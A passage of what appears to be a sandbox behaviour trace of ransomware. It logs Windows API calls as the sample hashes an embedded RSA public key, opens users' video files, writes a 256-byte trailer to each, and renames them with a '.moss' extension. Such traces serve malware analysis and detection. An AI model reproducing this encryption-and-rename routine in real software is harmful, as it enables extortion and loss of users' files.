KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.715] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.716] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.716] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.716] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.716] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.716] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.716] GetLastError () returned 0x0 [0172.716] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.716] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.717] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.717] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.717] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.717] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.717] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.717] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.718] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xd051, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.718] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.718] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\kCnE4Wx7UWtF P0rfv.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\kcne4wx7uwtf p0rfv.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\kCnE4Wx7UWtF P0rfv.mp4.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\kcne4wx7uwtf p0rfv.mp4.moss")) returned 1 [0172.720] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\KsWJF1Ex576B.mp4") returned=".mp4" [0172.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\KsWJF1Ex576B.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\kswjf1ex576b.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.720] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=63515) returned 1 [0172.720] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.725] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf7f5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.725] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.726] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.726] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xf81b, lpOverlapped=0x0) returned 1 [0172.727] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.727] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.727] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.727] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.727] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.728] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.728] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.728] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.728] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.728] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.728] GetLastError () returned 0x0 [0172.728] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.728] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.728] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.729] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.729] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.729] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.729] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.729] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.730] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf81b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.730] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.730] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\KsWJF1Ex576B.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\kswjf1ex576b.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\KsWJF1Ex576B.mp4.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\kswjf1ex576b.mp4.moss")) returned 1 [0172.732] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\WzqLj2L9U-8 _18ZV l.mp4") returned=".mp4" [0172.732] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\WzqLj2L9U-8 _18ZV l.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wzqlj2l9u-8 _18zv l.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.732] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=62863) returned 1 [0172.732] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.735] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf569, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.735] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.736] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xf58f, lpOverlapped=0x0) returned 1 [0172.737] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.737] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.737] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.737] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.738] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.738] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.738] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.738] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.739] GetLastError () returned 0x0 [0172.739] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.739] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.739] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.739] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.739] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.739] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.739] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.739] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.740] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf58f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.740] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.740] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\WzqLj2L9U-8 _18ZV l.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wzqlj2l9u-8 _18zv l.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\WzqLj2L9U-8 _18ZV l.mp4.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wzqlj2l9u-8 _18zv l.mp4.moss")) returned 1 [0172.742] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\ZlmeJ.swf") returned=".swf" [0172.742] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\ZlmeJ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\zlmej.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.742] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=1617) returned 1 [0172.742] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.744] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x62b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.744] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.745] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x651, lpOverlapped=0x0) returned 1 [0172.745] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.745] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.745] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.745] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.746] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.746] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.746] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.746] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.746] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.746] GetLastError () returned 0x0 [0172.746] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.746] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.747] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.747] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.747] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.747] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b44498 [0172.747] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x651, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.747] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.747] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\ZlmeJ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\zlmej.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\ZlmeJ.swf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\zlmej.swf.moss")) returned 1 [0172.749] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0172.749] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2840 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2eb68 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f0b8 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2efa8 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46080 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45e88 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee10 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b461d0 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdaa748 | out: hHeap=0xcd0000) returned 1 